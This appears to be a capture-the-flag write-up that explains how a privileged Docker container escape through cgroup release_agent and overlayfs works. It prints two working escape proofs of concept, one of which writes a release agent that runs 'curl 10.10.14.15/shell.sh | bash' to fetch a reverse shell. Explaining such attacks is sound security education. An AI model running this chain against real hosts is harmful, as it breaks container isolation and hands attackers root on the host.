Digging into cgroups Escape

The method I used in Ready to get code execution on the host system from a privileged Docker container was a series of bash commands that didn’t make any sense at first glance. I wanted to dive into them and see what was happening under the hood.

Background

POCs

The privileged Docker container escape POC I used looked like this:

root@gitlab:~# d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
root@gitlab:~# mkdir -p $d/w;echo 1 >$d/w/notify_on_release
root@gitlab:~# t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
root@gitlab:~# echo $t/c >$d/release_agent;printf '#!/bin/sh\ncurl 10.10.14.15/shell.sh | bash' >/c;
root@gitlab:~# chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";

To explain how this works, I’ll use a slightly different version of the POC (from the same article) because it’s a bit easier to follow:

mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /cmd
echo "curl 10.10.14.15/shell.sh | bash" >> /cmd
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

Both POCs take the same steps:

Find or create access to the RDMA cgroup controller.
Create a new cgroup within that controller.
Enable notify_on_release for that cgroup, and set the release agent to a file accessible from both the container and the host.
Start a quickly completing process within that cgroup, so that its termination triggers execution of the release agent.

cgroups

The first thing to understand is the idea of cgroups (control groups). It’s a Linux kernel feature that limits and accounts for the CPU, memory, and other resources used by a collection of processes within the cgroup. Julia Evans has a zine describing cgroups:

[Image: Julia Evans’s zine on cgroups]

cgroups are not exclusive to Docker, but they are used by Docker. This neat Medium post on Docker Internals goes into a lot more detail about how Docker uses cgroups for resource allocation.
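To make cgroup membership concrete: the kernel lists the cgroups a process belongs to in /proc/<pid>/cgroup, one `hierarchy-ID:controller-list:path` entry per line. The sketch below parses that format. The helper name `cgroup_path_for` and the sample data are made up for illustration, and it assumes the cgroup path itself contains no colons.

```shell
# cgroup_path_for CONTROLLER [FILE]
# Print the cgroup path for CONTROLLER from a /proc/<pid>/cgroup style file.
# Each line has the form  hierarchy-ID:controller-list:cgroup-path
# (assumes the cgroup path contains no ':' characters).
cgroup_path_for() {
    controller=$1
    file=${2:-/proc/self/cgroup}
    awk -F: -v c="$controller" '
        {
            n = split($2, names, ",")
            for (i = 1; i <= n; i++)
                if (names[i] == c) { print $3; exit }
        }' "$file"
}

# Sample data in the cgroup v1 format (values are made up for illustration).
sample=$(mktemp)
cat > "$sample" <<'EOF'
12:rdma:/
11:cpu,cpuacct:/docker/0123abcd
10:memory:/docker/0123abcd
EOF

cgroup_path_for rdma "$sample"      # prints /
cgroup_path_for cpuacct "$sample"   # prints /docker/0123abcd
```

On a live system, calling `cgroup_path_for memory` with no file argument reads /proc/self/cgroup for the current shell.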

overlayfs

The other concept that comes into play here is overlayfs, a “union mount filesystem” implementation in Linux. In overlayfs, there are two directories, upper and lower, that are merged to create another directory that represents the combination of the two. Julia Evans has another really helpful zine for overlayfs (she’s such a good resource!):

[Image: Julia Evans’s zine on overlayfs]

Julia has a post that goes into more detail with examples as well. The idea is that you can mount two file paths such that they create a third merged result. For example, the lower might be a container base image, and the upper might be changes made inside the container. In the merged result, if the file exists in both upper and lower, it shows the one from upper. If it doesn’t exist in upper, it shows the one from lower.

What’s important to know here is that by leaking the host’s filepath to the upper directory used for the docker container, I can write something in the container, and know where it will be on the host.
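The "upper wins, otherwise lower" rule can be mimicked with ordinary directories. This is only a simulation of the lookup rule, not a real overlay mount (which would need root), and it ignores details such as how deletions are recorded. The `resolve` helper and file names are hypothetical.

```shell
# Simulate the overlayfs lookup rule with ordinary directories.
# This is NOT a real overlay mount; it only mimics "upper wins, else lower".
work=$(mktemp -d)
mkdir -p "$work/lower" "$work/upper"

echo "from image"     > "$work/lower/etc_hosts"
echo "from image"     > "$work/lower/motd"
echo "from container" > "$work/upper/motd"   # modified inside the container
echo "from container" > "$work/upper/cmd"    # created inside the container

# resolve NAME: print the backing path the merged view would show for NAME.
resolve() {
    if [ -e "$work/upper/$1" ]; then
        echo "$work/upper/$1"
    elif [ -e "$work/lower/$1" ]; then
        echo "$work/lower/$1"
    else
        return 1
    fi
}

cat "$(resolve motd)"        # prints: from container
cat "$(resolve etc_hosts)"   # prints: from image
resolve cmd                  # a new file exists only under upper
```

The last call is the case that matters for the escape: anything newly written in the container ends up under the upper directory, so knowing that directory’s host path is enough to locate the file from the host.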

Steps

Find / Create cgroup Controller

The first two of the three commands on the first line of the POC create a directory and mount an RDMA cgroup controller on it (mount -t cgroup -o rdma):

mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

It uses the RDMA cgroup, but others would work as well (there’s a list in the cgroups man page). In the Trail of Bits post they show an error that comes up when there is no RDMA cgroup, and suggest just changing rdma to memory to continue in another cgroup.
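One way to check which controllers a kernel offers before picking one is /proc/cgroups, which lists each controller along with an enabled flag. The following is a minimal sketch with made-up sample data; `list_controllers` and `has_controller` are hypothetical helper names.

```shell
# list_controllers [FILE]
# Print the names of enabled controllers from a /proc/cgroups style file.
# Columns: subsys_name  hierarchy  num_cgroups  enabled
list_controllers() {
    awk '!/^#/ && $4 == 1 { print $1 }' "${1:-/proc/cgroups}"
}

# has_controller NAME [FILE]: succeed if NAME is listed as enabled.
has_controller() {
    list_controllers "${2:-/proc/cgroups}" | grep -qx "$1"
}

# Made-up sample so the sketch runs anywhere; on a real system, call
# list_controllers with no argument.
sample_cgroups=$(mktemp)
printf '#subsys_name\thierarchy\tnum_cgroups\tenabled\n' >  "$sample_cgroups"
printf 'cpu\t3\t80\t1\nmemory\t9\t120\t1\nhugetlb\t0\t1\t0\n' >> "$sample_cgroups"

if has_controller rdma "$sample_cgroups"; then
    controller=rdma
else
    controller=memory   # the fallback the Trail of Bits post suggests
fi
echo "$controller"      # prints memory for this sample
```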

The original POC finds an existing mount of the rdma cgroup controller using a somewhat obfuscated ls command:

root@gitlab:~# dirname $(ls -x /s*/fs/c*/*/r* |head -n1)    
/sys/fs/cgroup/rdma
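The glob is just a compressed spelling of /sys/fs/cgroup/*/r*, so it matches files such as release_agent, and dirname then strips the file name. The sketch below replays it against a made-up directory tree in which only the rdma directory contains a file starting with r. That layout is an assumption chosen to reproduce the output above, not a claim about every container.

```shell
# Build a fake tree that stands in for /sys/fs/cgroup (layout is made up).
tree=$(mktemp -d)
mkdir -p "$tree/sys/fs/cgroup/rdma" "$tree/sys/fs/cgroup/memory"
: > "$tree/sys/fs/cgroup/rdma/release_agent"
: > "$tree/sys/fs/cgroup/rdma/notify_on_release"
: > "$tree/sys/fs/cgroup/memory/notify_on_release"

# Same glob as the POC, rooted at the fake tree instead of /.
# s* -> sys, c* -> cgroup, * -> any controller directory, r* -> release_agent
d=$(dirname "$(ls -x "$tree"/s*/fs/c*/*/r* | head -n1)")
echo "$d"    # prints the rdma directory inside the fake tree
```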

cgroup controllers are global resources, so mounting one again inside the container gives access to the same controller the host uses. Changes made here will be reflected in the host’s RDMA controller. A container that isn’t running as privileged won’t have access to this.

Create New cgroup

Next, each POC creates a cgroup (directory) in that mount, x (or w in the original POC):

mkdir /tmp/cgrp/x

mkdir -p $d/w;

Just creating the directory causes the kernel to populate it with several files:

root@gitlab:~# ls /tmp/cgrp/x/
cgroup.clone_children  notify_on_release  rdma.max
cgroup.procs           rdma.current       tasks

Configure Release

The next command writes a 1 to notify_on_release, which enables cgroup notifications on release:

If the notify_on_release flag is enabled (1) in a cgroup, then
whenever the last task in the cgroup leaves (exits or attaches to
some other cgroup) and the last child cgroup of that cgroup
is removed, then the kernel runs the command specified by the contents
of the "release_agent" file in that hierarchy's root directory,
supplying the pathname (relative to the mount point of the cgroup
file system) of the abandoned cgroup.

In each POC:

echo 1 > /tmp/cgrp/x/notify_on_release

echo 1 >$d/w/notify_on_release
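Putting the documentation above together, two things have to be true for the agent to fire: the child cgroup has notify_on_release set to 1, and the release_agent file in the hierarchy’s root names a program. Here is a minimal sketch of that check, run against a fake hierarchy made of regular files so it needs neither root nor a cgroup mount. `release_armed` is a hypothetical helper and the agent path is a placeholder.

```shell
# release_armed ROOT CHILD
# Succeed if CHILD (a cgroup directory under the v1 hierarchy mounted at ROOT)
# has notify_on_release set to 1 and ROOT/release_agent is non-empty.
release_armed() {
    root=$1 child=$2
    [ "$(cat "$root/$child/notify_on_release" 2>/dev/null)" = "1" ] || return 1
    [ -n "$(cat "$root/release_agent" 2>/dev/null)" ]
}

# Fake hierarchy built from regular files (not a real cgroup mount).
fake=$(mktemp -d)
mkdir -p "$fake/x"
echo 0 > "$fake/x/notify_on_release"
: > "$fake/release_agent"

release_armed "$fake" x && echo armed || echo "not armed"   # prints: not armed

echo 1 > "$fake/x/notify_on_release"
echo /path/to/agent > "$fake/release_agent"                 # placeholder path
release_armed "$fake" x && echo armed || echo "not armed"   # prints: armed
```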

Most of the remaining commands are dedicated to setting the release agent, which is what will get run on the release notification. First, the POC needs to find the mapping so that the host can reference a file written in the container. /etc/mtab has a list of all the mount points for the system, including the overlayfs mount:

root@gitlab:~# grep upper /etc/mtab   
overlay / overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/GIXQ4D2FJ63I5OGALTCGDBK6KT:/var/lib/docker/overlay2/l/PZB5MARGIAOF6N5AAJNTVUFS52:/var/lib/docker/overlay2/l/4KSUGTOLFYSBJFJQH2NUGVL54R:/var/lib/docker/overlay2/l/PJ4IKL6MDRM2ZSGFRAXCVHVLUR:/var/lib/docker/overlay2/l/XLLFVBBMKEEE672BOIVTSZ5XQZ:/var/lib/docker/overlay2/l/33JTQXWWPTNINADNR6R3YM47KY:/var/lib/docker/overlay2/l/XG5BUSKVZNINSBJD2J7MMLU5A3:/var/lib/docker/overlay2/l/ZI5Y7RO6WUTDK3DQVTUTOA2ZWI:/var/lib/docker/overlay2/l/SRZJCUXAPFOW35HRDPW7OHQWXN:/var/lib/docker/overlay2/l/SLR2WWC4VRYMZRPZ6EHZQSLNYS:/var/lib/docker/overlay2/l/SJBEI24D42KKTO5Z54GMKQPPXO,upperdir=/var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/diff,workdir=/var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/work,xino=off 0 0

The next command in the POC uses sed to get just the string that is the upperdir path:

host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`

Running that shows where on the host filesystem the container files are:

root@gitlab:~# sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab
/var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/diff
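To see what each piece of the sed expression does, here is the same substitution run against a shortened, made-up mtab line, with "upperdir" spelled out in full rather than abbreviated. The directory IDs are placeholders, not values from Ready.

```shell
# A shortened, made-up overlay line in /etc/mtab format (IDs are placeholders).
mtab_line='overlay / overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/AAAA:/var/lib/docker/overlay2/l/BBBB,upperdir=/var/lib/docker/overlay2/abc123/diff,workdir=/var/lib/docker/overlay2/abc123/work,xino=off 0 0'

# The substitution, piece by piece:
#   .*upperdir=    skip everything up to and including "upperdir="
#   \([^,]*\)      capture up to (not including) the next comma
#   .*             swallow the rest of the line
# -n plus the trailing p prints only lines where the substitution matched.
host_path=$(printf '%s\n' "$mtab_line" | sed -n 's/.*upperdir=\([^,]*\).*/\1/p')
echo "$host_path"        # prints /var/lib/docker/overlay2/abc123/diff

# A file written at /cmd in the container would appear on the host at:
echo "$host_path/cmd"    # prints /var/lib/docker/overlay2/abc123/diff/cmd
```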

As an experiment, I’ll create a file in the root home dir on the container:

root@gitlab:~# echo "0xdf was here" > 0xdf 

With an SSH shell as root on the host, I can see that file shows up in the upperdir:

root@ready:/var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/diff# ls
bin  etc  home  opt  root  root_pass  run  tmp  usr  var
root@ready:/var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/diff# cd root/
root@ready:/var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/diff/root# ls
0xdf
root@ready:/var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/diff/root# cat 0xdf 
0xdf was here

This helps because now I can write the release agent script (a simple reverse shell) in the container, and then call it from the host. That’s what the next few commands do. Set the file from the host’s perspective as the release_agent:

echo "$host_path/cmd" > /tmp/cgrp/release_agent

Write the reverse shell from within the container:

echo '#!/bin/sh' > /cmd
echo "curl 10.10.14.15/shell.sh | bash" >> /cmd
chmod a+x /cmd

Trigger Release

Now everything is set up so that when the last process within this new cgroup terminates, the kernel will run the release agent, which fetches and runs the reverse shell. All I need to do now is start a process within that cgroup and then let it finish. The POC makes use of a neat trick to do that. It starts a short-lived sh process, and has that process write its own PID ($$) into the cgroup.procs file:

sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

This leads to the PID being in that file, and then the sh process exiting as soon as the echo completes. The kernel removes the exited PID from the x cgroup, sees that the cgroup is now empty, and, because notify_on_release is set, runs the release agent.
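One detail worth checking when retyping this command is which shell expands `$$`. Inside double quotes, the calling shell substitutes its own PID before sh ever starts, so the `$$` has to be escaped (or single-quoted) for the short-lived sh to report its own PID. A small sketch of the difference, with variable names of my own choosing:

```shell
outer_pid=$$

# Double quotes, unescaped: the calling shell substitutes its own PID
# into the command string before sh starts.
unescaped=$(sh -c "echo $$")

# Single quotes (or \$\$ inside double quotes): the new sh expands $$ itself.
escaped=$(sh -c 'echo $$')

echo "calling shell: $outer_pid"
echo "unescaped:     $unescaped"   # same PID as the calling shell
echo "escaped:       $escaped"     # PID of the short-lived sh
```

With the unescaped form, the long-lived calling shell is what gets moved into the new cgroup, so the cgroup would not empty out until that shell itself exits.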
